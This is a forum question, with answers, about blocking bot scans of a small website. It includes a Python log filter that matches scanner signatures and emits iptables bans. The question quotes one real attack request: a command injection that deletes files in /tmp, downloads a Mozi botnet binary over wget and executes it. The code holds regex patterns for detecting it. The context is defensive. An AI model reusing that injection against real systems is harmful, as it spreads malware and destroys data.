linux
ramiil, 2021-09-10 11:35:59

What to do with hacker http requests?

I have a small site, and lately it has started receiving various HTTP requests unrelated to the site's content, for example:

get wp-login.php
get /gponform/diag_form?images/
get /shell?cd+/tmp;rm+-rf+*;wget+ 192.168.1.1:8088/mozi.a;chmod+777+mozi.a;/tmp/mozi ...

Obviously these are attackers and their bots scanning the site for vulnerabilities. The question is what to do with them. I wrote a script that bans them via iptables, but maybe there are sites that maintain ban lists or signatures/regexes for detecting malicious requests?
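One way to turn the access log into a ban list while keeping real users out of it, as an added example rather than the asker's own script: a small Python filter whose signatures are derived from the three probes quoted in the question, with a per-IP hit threshold and an allowlist so monitoring or admin hosts are never banned. The log lines, IP ranges and signature list are constructed for the example.

```python
import re
from collections import Counter
from ipaddress import ip_address, ip_network

# Signatures derived from the probes quoted in the question (constructed list,
# not a published ruleset): WordPress login probes, the GPON router diag form,
# and command injection attempts through a /shell? query string.
SCAN_SIGNATURES = [
    ("wp-login", re.compile(r"/wp-login\.php", re.I)),
    ("gpon-diag", re.compile(r"/gponform/diag_form", re.I)),
    ("shell-cmdinj", re.compile(r"/shell\?.*(cd\+/tmp|;|\|\||wget\+)", re.I)),
]

# Combined Log Format: client IP first, then "METHOD PATH PROTO" in quotes.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*"')

# Networks that must never be banned (assumed: the admin's own range, uptime monitors).
ALLOWLIST = [ip_network("192.0.2.0/24")]

def classify(line):
    """Return (ip, signature_name) if the request matches a scanner signature, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for name, pattern in SCAN_SIGNATURES:
        if pattern.search(m.group("path")):
            return m.group("ip"), name
    return None

def ban_candidates(lines, threshold=1):
    """Count signature hits per IP; return sorted IPs at/above threshold, skipping the allowlist."""
    hits = Counter()
    for line in lines:
        result = classify(line)
        if result:
            hits[result[0]] += 1
    return sorted(ip for ip, n in hits.items()
                  if n >= threshold and not any(ip_address(ip) in net for net in ALLOWLIST))

def iptables_rules(ips):
    """Render one DROP rule per IP, the form a ban script would feed to iptables."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in ips]

# Constructed sample log lines (documentation IP ranges, not real clients).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Sep/2021:11:35:59 +0300] "GET /wp-login.php HTTP/1.1" 404 162 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Sep/2021:11:36:01 +0300] "GET /gponform/diag_form?images/ HTTP/1.1" 404 162 "-" "-"',
    '198.51.100.9 - - [10/Sep/2021:11:36:05 +0300] "GET /shell?cd+/tmp;rm+-rf+* HTTP/1.1" 404 162 "-" "-"',
    '192.0.2.5 - - [10/Sep/2021:11:36:10 +0300] "GET /wp-login.php HTTP/1.1" 404 162 "-" "uptime-check"',
    '203.0.113.20 - - [10/Sep/2021:11:36:12 +0300] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
```

Raising `threshold` trades faster banning for fewer false positives; the allowlist is what keeps the asker's own hosts and monitors off the list.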

4 answer(s)
Alexander, 2021-09-10
@AleksandrB

Ignore them. You can't ban everyone, but if you try, you can easily end up banning real users.
Just don't leave such vulnerabilities in place.

Mnemonic0, 2021-09-10
@Mnemonic0

A WAF is what will help you. Bans by IP / region are like blocking whole /8 networks when trying to block Telegram.
In short: hide behind a CDN (CloudFront, for example) and enable AWS WAF checks on it; 95% of all hacking attempts will be shut out.
The remaining 5% will be much more expensive to close, it all depends on the money that will be lost from the downtime of the site.

Satisfied IT specialist, 2021-09-10
@borisdenis

Decide on your target audience: if it is the Russian Federation, then you don't need access from other countries and can safely ban the subnets of America, etc.
At the very least ban the subnets of China; the most inadequate requests constantly come from there.
You can also put the known Tor exit nodes on the ban list, and add Amazon servers and the like to it as well.
The volume of any such garbage will drop significantly; the main thing is not to ban the ones you need)))
